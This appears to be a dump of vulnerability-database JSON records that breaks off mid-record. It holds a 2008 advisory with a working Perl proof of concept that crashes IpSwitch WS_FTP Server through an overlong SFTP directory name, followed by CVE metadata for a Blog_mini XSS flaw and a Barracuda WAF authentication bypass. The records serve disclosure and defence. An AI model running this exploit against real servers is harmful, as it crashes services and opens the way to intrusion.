{"id": "SECURITYVULNS:DOC:18999", "bulletinFamily": "software", "title": "IpSwitch WS_FTPSERVER with SSH remote Buffer Overflow", "description": "#IpSwitch WS_FTPSERVER with SSH remote Buffer Overflow\r\n#\r\n# Website:http://www.wsftp.com/products/ws_ftp_server/\r\n#\r\n# Version:6.1.0.0 ( last one,others might be vuln too )\r\n#\r\n# Bug: Remote Buffer Overflow ( CD)\r\n#\r\n# (8e8.a78): Access violation - code c0000005 (first chance)\r\n# First chance exceptions are reported before any exception handling.\r\n# This exception may be expected and handled.\r\n# eax=00000000 ebx=00000000 ecx=00410041 edx=7c9137d8 esi=00000000 edi=00000000\r\n# eip=00410041 esp=04b8c830 ebp=04b8c850 iopl=0 nv up ei pl zr na po nc\r\n# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246\r\n# 00410041 ?? ???\r\n#\r\n#\r\n#Here's the PoC :\r\n\r\n\r\n\r\nuse strict;\r\nuse Net::SSH2;\r\nmy $ip="127.0.0.1";\r\nmy $port=22;\r\nmy $user="USERNAME";\r\nmy $pass="PASSWORD";\r\nmy $ssh2 = Net::SSH2->new();\r\nmy $payload ="A" x 5131;\r\n$ssh2->connect($ip, $port) || die "could not connect";\r\n$ssh2->auth_password($user,$pass)|| die "wrong passwd/login";\r\nprint "Poc running ...\n";\r\nmy $sftp = $ssh2->sftp\r\nmy $dir = $sftp->opendir($payload); \r\nprint "Buffer Overflow Successfull\n";\r\n$ssh2->disconnect();\r\nexit;", "published": "2008-02-03T00:00:00", "modified": "2008-02-03T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:18999", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:24", "edition": 1, "viewCount": 12, "enchantments": {"score": {"value": 2.9, "vector": "NONE", "modified": "2018-08-31T11:10:24", "rev": 2}, "dependencies": {"references": [{"type": "mskb", "idList": ["KB3023167", "KB2880833", "KB3209587", "KB981401", "KB2788321", "KB955430"]}, {"type": "threatpost", "idList": ["THREATPOST:F3563336B135A1D7C1251AE54FDC6286"]}, {"type": "nessus", "idList": ["DEBIAN_DLA-2164.NASL", "FREEBSD_PKG_D887B3D9736611EAB81A001CC0382B2F.NASL", "FREEBSD_PKG_090763F6703011EA93DD080027846A02.NASL", "FREEBSD_PKG_40194E1C6D8911EA808280EE73419AF3.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310892164"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2164-1:52F3C"]}, {"type": "freebsd", "idList": ["D887B3D9-7366-11EA-B81A-001CC0382B2F"]}, {"type": "zdt", "idList": ["1337DAY-ID-34159", "1337DAY-ID-34153", "1337DAY-ID-34144", "1337DAY-ID-34158", "1337DAY-ID-34154", "1337DAY-ID-34157"]}], "modified": "2018-08-31T11:10:24", "rev": 2}, "vulnersScore": 2.9}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}}

{"cve": [{"id": "CVE-2020-18999", "bulletinFamily": "NVD", "title": "CVE-2020-18999", "description": "Cross Site Scripting (XSS) in Blog_mini v1.0 allows remote attackers to execute arbitrary code via the component '/admin/submit-articles'.", "published": "2021-08-27T19:15:00", "modified": "2021-09-01T01:04:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {}, "cvss3": {}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-18999", "reporter": "cve@mitre.org", "references": ["https://github.com/xpleaf/Blog_mini/issues/44"], "cvelist": ["CVE-2020-18999"], "immutableFields": [], "type": "cve", "lastseen": "2021-09-01T10:56:16", "history": [{"bulletin": {"affectedConfiguration": [], "affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "cvelist": ["CVE-2020-18999"], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "cwe": [], "description": "Cross Site Scripting (XSS) in Blog_mini v1.0 allows remote attackers to execute arbitrary code via the component '/admin/submit-articles'.", "edition": 1, "enchantments": {"dependencies": {"modified": "2021-08-28T08:56:12", "references": [], "rev": 2}, "score": {"modified": "2021-08-28T08:56:12", "rev": 2, "value": 7.0, "vector": "NONE"}, "twitter": {"counter": 6, "modified": "2021-08-28T08:56:12", "tweets": [{"link": "https://twitter.com/eyeTSystems/status/1431519336221585408", "text": "CVE-2020-18999 Cross Site Scripting (XSS) in Blog_mini v1.0 allows remote attackers to execute arbitrary code via the component '/admin/submit-articles'. https://t.co/ihjSYv3phl?amp=1"}, {"link": "https://twitter.com/eyeTSystems/status/1431519336221585408", "text": "CVE-2020-18999 Cross Site Scripting (XSS) in Blog_mini v1.0 allows remote attackers to execute arbitrary code via the component '/admin/submit-articles'. https://t.co/ihjSYv3phl?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1431527090558537730", "text": " NEW: CVE-2020-18999 Cross Site Scripting (XSS) in Blog_mini v1.0 allows remote attackers to execute arbitrary code via the component '/admin/submit-articles'. Severity: [object Object] https://t.co/nrJ1oZWmxa?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1431527090558537730", "text": " NEW: CVE-2020-18999 Cross Site Scripting (XSS) in Blog_mini v1.0 allows remote attackers to execute arbitrary code via the component '/admin/submit-articles'. Severity: [object Object] https://t.co/nrJ1oZWmxa?amp=1"}, {"link": "https://twitter.com/SecRiskRptSME/status/1431520354816626694", "text": "RT:\n\nCVE-2020-18999 Cross Site Scripting (XSS) in Blog_mini v1.0 allows remote attackers to execute arbitrary code via the component '/admin/submit-articles'. https://t.co/3N34UZFb5a?amp=1\n\n\u2014 CVE (/CVEnew) Aug 27, 2021"}, {"link": "https://twitter.com/SecRiskRptSME/status/1431520354816626694", "text": "RT:\n\nCVE-2020-18999 Cross Site Scripting (XSS) in Blog_mini v1.0 allows remote attackers to execute arbitrary code via the component '/admin/submit-articles'. https://t.co/3N34UZFb5a?amp=1\n\n\u2014 CVE (/CVEnew) Aug 27, 2021"}]}}, "extraReferences": [{"name": "https://github.com/xpleaf/Blog_mini/issues/44", "refsource": "MISC", "tags": [], "url": "https://github.com/xpleaf/Blog_mini/issues/44"}], "hash": "1ce52ed7b1a0135f1654e59f70d6bbbc7640a31a628711c7062d5d75373a2261", "hashmap": [{"hash": "9291a856aa35512d1f6b1e9dfae38559", "key": "title"}, {"hash": "db6693fd9e9746ce739e5cc2f0729275", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cwe"}, {"hash": "8b8452238e1a560fd9a03c08e6602e08", "key": "description"}, {"hash": "c9161c5a66fcfc3041404649d1011c3d", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "10550a322d323001c62cb6ca8e1d2167", "key": "published"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "6989b1ecca2bbc99f6cdf758ec2a4623", "key": "extraReferences"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "2df2d8d4ad489c77b52992df7907ada2", "key": "references"}, {"hash": "ba205a95d55e66d2b1bee1e6b160bdae", "key": "modified"}, {"hash": "81342635da437da3b0897e10f103e0d6", "key": "cpeConfiguration"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-18999", "id": "CVE-2020-18999", "immutableFields": [], "lastseen": "2021-08-28T08:56:12", "modified": "2021-08-28T00:33:00", "objectVersion": "1.6", "published": "2021-08-27T19:15:00", "references": ["https://github.com/xpleaf/Blog_mini/issues/44"], "reporter": "cve@mitre.org", "title": "CVE-2020-18999", "type": "cve", "viewCount": 3}, "different_elements": ["extraReferences", "cpe23", "cvss", "modified", "cpe", "cwe", "affectedSoftware", "cpeConfiguration"], "edition": 1, "lastseen": "2021-08-28T08:56:12"}], "edition": 2, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "f1561a14bc33e6e19cf0ad002833136b"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "429d82edb221fc3ea30eed329ae87008"}, {"key": "cpe23", "hash": "a7d1e5b9e4113570f25e65c69dac55ff"}, {"key": "cpeConfiguration", "hash": "45108fe0f65f3e713f13f2e4b6da20e0"}, {"key": "cvelist", "hash": "db6693fd9e9746ce739e5cc2f0729275"}, {"key": "cvss", "hash": "f74a1c24e49a5ecb0eefb5e51d4caa14"}, {"key": "cvss2", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cwe", "hash": "34e69e045b64924bccf865d56b6918a2"}, {"key": "description", "hash": "8b8452238e1a560fd9a03c08e6602e08"}, {"key": "extraReferences", "hash": "9e9bd85ef6f0df3ff92d53a0937c2619"}, {"key": "href", "hash": "c9161c5a66fcfc3041404649d1011c3d"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "319857b42a17f2ed3716dd99aafeb0ca"}, {"key": "published", "hash": "10550a322d323001c62cb6ca8e1d2167"}, {"key": "references", "hash": "2df2d8d4ad489c77b52992df7907ada2"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "9291a856aa35512d1f6b1e9dfae38559"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "559bc40712fa5b8255b2a4e52aa306b1a91d2916a570d68ac203aaf16e195257", "viewCount": 4, "enchantments": {"dependencies": {"references": [], "modified": "2021-09-01T10:56:16", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2021-09-01T10:56:16", "rev": 2}, "twitter": {"counter": 6, "modified": "2021-08-28T08:56:12", "tweets": [{"link": "https://twitter.com/eyeTSystems/status/1431519336221585408", "text": "CVE-2020-18999 Cross Site Scripting (XSS) in Blog_mini v1.0 allows remote attackers to execute arbitrary code via the component '/admin/submit-articles'. https://t.co/ihjSYv3phl?amp=1"}, {"link": "https://twitter.com/eyeTSystems/status/1431519336221585408", "text": "CVE-2020-18999 Cross Site Scripting (XSS) in Blog_mini v1.0 allows remote attackers to execute arbitrary code via the component '/admin/submit-articles'. https://t.co/ihjSYv3phl?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1431527090558537730", "text": " NEW: CVE-2020-18999 Cross Site Scripting (XSS) in Blog_mini v1.0 allows remote attackers to execute arbitrary code via the component '/admin/submit-articles'. Severity: [object Object] https://t.co/nrJ1oZWmxa?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1431527090558537730", "text": " NEW: CVE-2020-18999 Cross Site Scripting (XSS) in Blog_mini v1.0 allows remote attackers to execute arbitrary code via the component '/admin/submit-articles'. Severity: [object Object] https://t.co/nrJ1oZWmxa?amp=1"}, {"link": "https://twitter.com/SecRiskRptSME/status/1431520354816626694", "text": "RT:\n\nCVE-2020-18999 Cross Site Scripting (XSS) in Blog_mini v1.0 allows remote attackers to execute arbitrary code via the component '/admin/submit-articles'. https://t.co/3N34UZFb5a?amp=1\n\n\u2014 CVE (/CVEnew) Aug 27, 2021"}, {"link": "https://twitter.com/SecRiskRptSME/status/1431520354816626694", "text": "RT:\n\nCVE-2020-18999 Cross Site Scripting (XSS) in Blog_mini v1.0 allows remote attackers to execute arbitrary code via the component '/admin/submit-articles'. https://t.co/3N34UZFb5a?amp=1\n\n\u2014 CVE (/CVEnew) Aug 27, 2021"}]}}, "objectVersion": "1.6", "cpe": ["cpe:/a:blog_mini_project:blog_mini:1.0"], "affectedSoftware": [{"cpeName": "blog_mini_project:blog_mini", "name": "blog mini project blog mini", "operator": "eq", "version": "1.0"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:blog_mini_project:blog_mini:1.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "https://github.com/xpleaf/Blog_mini/issues/44", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "Issue Tracking"], "url": "https://github.com/xpleaf/Blog_mini/issues/44"}], "cpe23": ["cpe:2.3:a:blog_mini_project:blog_mini:1.0:*:*:*:*:*:*:*"], "cwe": ["CWE-79"], "scheme": null}, {"bulletinFamily": "NVD", "hash": "6a0ace8cdb63863b470e6561269f441d83851201520bc6a55e7930a925c15e3a", "id": "CVE-2014-2595", "lastseen": "2021-04-22T23:44:08", "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "objectVersion": "1.5", "published": "2020-02-12T01:15:00", "cvelist": ["CVE-2014-2595"], "viewCount": 73, "modified": "2020-02-20T15:55:00", "references": ["https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "http://www.osvdb.org/109782", "https://www.securityfocus.com/bid/69028", "https://www.exploit-db.com/exploits/39278", "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "http://seclists.org/fulldisclosure/2014/Aug/5"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "edition": 8, "reporter": "cve@mitre.org", "title": "CVE-2014-2595", "history": [{"bulletin": {"affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cvelist": ["CVE-2014-2595"], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "cwe": [], "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 3, "enchantments": {"dependencies": {"modified": "2020-02-13T14:29:47", "references": [{"idList": ["PACKETSTORM:127740"], "type": "packetstorm"}, {"idList": ["SECURITYVULNS:DOC:31004", "SECURITYVULNS:VULN:13887"], "type": "securityvulns"}, {"idList": ["EDB-ID:39278"], "type": "exploitdb"}]}, "score": {"modified": "2020-02-13T14:29:47", "value": 6.9, "vector": "NONE"}}, "hash": "0d148bb322c927927cf5c8adaba4daf0d811bf2bee4917f93ca62ca2f942333e", "hashmap": [{"hash": "584cd9e6927eaaa814c6545414f09911", "key": "description"}, {"hash": "cf46dbeffc0c7dc51130bcd388b4459a", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "afd8c4a8002c25596504fc1efc107886", "key": "cvelist"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "23075837e6c728c8f0077b2ae5d5ee7f", "key": "modified"}, {"hash": "6c607768196e3786ab17cb3a6e516cad", "key": "published"}, {"hash": "756bd44ad36e62b951b7a08611cbd3f5", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "bc7f8fc71017e1124d57947313af5643", "key": "title"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "id": "CVE-2014-2595", "lastseen": "2020-02-13T14:29:47", "modified": "2020-02-12T13:07:00", "objectVersion": "1.3", "published": "2020-02-12T01:15:00", "references": ["https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "http://www.osvdb.org/109782", "https://www.securityfocus.com/bid/69028", "https://www.exploit-db.com/exploits/39278", "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "http://seclists.org/fulldisclosure/2014/Aug/5"], "reporter": "cve@mitre.org", "title": "CVE-2014-2595", "type": "cve", "viewCount": 28}, "differentElements": ["cpe23", "cvss", "cvss2", "modified", "cpe", "cwe", "affectedSoftware"], "edition": 3, "lastseen": "2020-02-13T14:29:47"}, {"bulletin": {"affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cvelist": ["CVE-2014-2595"], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "cwe": [], "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 2, "enchantments": {"dependencies": {"modified": "2020-02-12T14:27:29", "references": [{"idList": ["PACKETSTORM:127740"], "type": "packetstorm"}, {"idList": ["SECURITYVULNS:DOC:31004", "SECURITYVULNS:VULN:13887"], "type": "securityvulns"}, {"idList": ["EDB-ID:39278"], "type": "exploitdb"}]}, "score": {"modified": "2020-02-12T14:27:29", "value": 6.9, "vector": "NONE"}}, "hash": "6ccf8f84237981876cda9914b348e4e11c8972875cdf630f59422732f1ea69ba", "hashmap": [{"hash": "584cd9e6927eaaa814c6545414f09911", "key": "description"}, {"hash": "cf46dbeffc0c7dc51130bcd388b4459a", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "6c607768196e3786ab17cb3a6e516cad", "key": "modified"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "afd8c4a8002c25596504fc1efc107886", "key": "cvelist"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6c607768196e3786ab17cb3a6e516cad", "key": "published"}, {"hash": "756bd44ad36e62b951b7a08611cbd3f5", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "bc7f8fc71017e1124d57947313af5643", "key": "title"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "id": "CVE-2014-2595", "lastseen": "2020-02-12T14:27:29", "modified": "2020-02-12T01:15:00", "objectVersion": "1.3", "published": "2020-02-12T01:15:00", "references": ["https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "http://www.osvdb.org/109782", "https://www.securityfocus.com/bid/69028", "https://www.exploit-db.com/exploits/39278", "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "http://seclists.org/fulldisclosure/2014/Aug/5"], "reporter": "cve@mitre.org", "title": "CVE-2014-2595", "type": "cve", "viewCount": 28}, "differentElements": ["modified"], "edition": 2, "lastseen": "2020-02-12T14:27:29"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "barracuda:web_application_firewall", "name": "barracuda web application firewall", "operator": "eq", "version": "7.8.1.013"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2014-2595"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "cwe": ["CWE-613"], "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 6, "enchantments": {"dependencies": {"modified": "2020-10-03T12:01:15", "references": [{"idList": ["PACKETSTORM:127740"], "type": "packetstorm"}, {"idList": ["SECURITYVULNS:DOC:31004", "SECURITYVULNS:VULN:13887"], "type": "securityvulns"}, {"idList": ["EDB-ID:39278"], "type": "exploitdb"}], "rev": 2}, "score": {"modified": "2020-10-03T12:01:15", "rev": 2, "value": 6.9, "vector": "NONE"}}, "extraReferences": [], "hash": "65fabd8c3b92ccbba797b3dfba517234b9e0e8bc2464531f2cd64047dd457870", "hashmap": [{"hash": "584cd9e6927eaaa814c6545414f09911", "key": "description"}, {"hash": "cf46dbeffc0c7dc51130bcd388b4459a", "key": "references"}, {"hash": "92ee34fefd5301ff6ccb77b813c8d4f8", "key": "modified"}, {"hash": "86870277fcb3e3e121fe9e4f1f7c2b51", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "405ecfc0fb244283a2773863614145bf", "key": "cpe23"}, {"hash": "e63509ce8b627fb239a5a63969122026", "key": "cvss2"}, {"hash": "832b9c21b4589969549f63eb0724398c", "key": "cpe"}, {"hash": "0e66a595df2112e69adac8e55cbdb92d", "key": "cpeConfiguration"}, {"hash": "a97b191a26cb922c0b82d26c5f04f4db", "key": "affectedSoftware"}, {"hash": "ad35358d166de03a84a3a9280d95337a", "key": "cvss3"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "afd8c4a8002c25596504fc1efc107886", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "extraReferences"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6c607768196e3786ab17cb3a6e516cad", "key": "published"}, {"hash": "0b053db5674b87efff89989a8a720df3", "key": "cvss"}, {"hash": "756bd44ad36e62b951b7a08611cbd3f5", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "bc7f8fc71017e1124d57947313af5643", "key": "title"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "id": "CVE-2014-2595", "lastseen": "2020-10-03T12:01:15", "modified": "2020-02-20T15:55:00", "objectVersion": "1.3", "published": "2020-02-12T01:15:00", "references": ["https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "http://www.osvdb.org/109782", "https://www.securityfocus.com/bid/69028", "https://www.exploit-db.com/exploits/39278", "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "http://seclists.org/fulldisclosure/2014/Aug/5"], "reporter": "cve@mitre.org", "title": "CVE-2014-2595", "type": "cve", "viewCount": 56}, "differentElements": ["extraReferences"], "edition": 6, "lastseen": "2020-10-03T12:01:15"}, {"bulletin": {"affectedSoftware": [{"name": "barracuda web_application_firewall", "operator": "eq", "version": "7.8.1.013"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"], "cvelist": ["CVE-2014-2595"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cwe": ["CWE-613"], "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 4, "enchantments": {"dependencies": {"modified": "2020-02-21T13:06:26", "references": [{"idList": ["PACKETSTORM:127740"], "type": "packetstorm"}, {"idList": ["SECURITYVULNS:DOC:31004", "SECURITYVULNS:VULN:13887"], "type": "securityvulns"}, {"idList": ["EDB-ID:39278"], "type": "exploitdb"}], "rev": 2}, "score": {"modified": "2020-02-21T13:06:26", "rev": 2, "value": 6.9, "vector": "NONE"}}, "hash": "4423bdd8d6936961112ee89e752cf7c866f443470052f4a4ac3529b4be6ae18f", "hashmap": [{"hash": "584cd9e6927eaaa814c6545414f09911", "key": "description"}, {"hash": "cf46dbeffc0c7dc51130bcd388b4459a", "key": "references"}, {"hash": "92ee34fefd5301ff6ccb77b813c8d4f8", "key": "modified"}, {"hash": "86870277fcb3e3e121fe9e4f1f7c2b51", "key": "cwe"}, {"hash": "405ecfc0fb244283a2773863614145bf", "key": "cpe23"}, {"hash": "e63509ce8b627fb239a5a63969122026", "key": "cvss2"}, {"hash": "832b9c21b4589969549f63eb0724398c", "key": "cpe"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "afd8c4a8002c25596504fc1efc107886", "key": "cvelist"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6c607768196e3786ab17cb3a6e516cad", "key": "published"}, {"hash": "0b053db5674b87efff89989a8a720df3", "key": "cvss"}, {"hash": "756bd44ad36e62b951b7a08611cbd3f5", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "bc7f8fc71017e1124d57947313af5643", "key": "title"}, {"hash": "ee2d931efb4c4fa7a1a321df76c0b838", "key": "affectedSoftware"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "id": "CVE-2014-2595", "lastseen": "2020-02-21T13:06:26", "modified": "2020-02-20T15:55:00", "objectVersion": "1.3", "published": "2020-02-12T01:15:00", "references": ["https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "http://www.osvdb.org/109782", "https://www.securityfocus.com/bid/69028", "https://www.exploit-db.com/exploits/39278", "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "http://seclists.org/fulldisclosure/2014/Aug/5"], "reporter": "cve@mitre.org", "title": "CVE-2014-2595", "type": "cve", "viewCount": 47}, "differentElements": ["cvss3", "affectedSoftware"], "edition": 4, "lastseen": "2020-02-21T13:06:26"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "barracuda:web_application_firewall", "name": "barracuda web application firewall", "operator": "eq", "version": "7.8.1.013"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2014-2595"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": 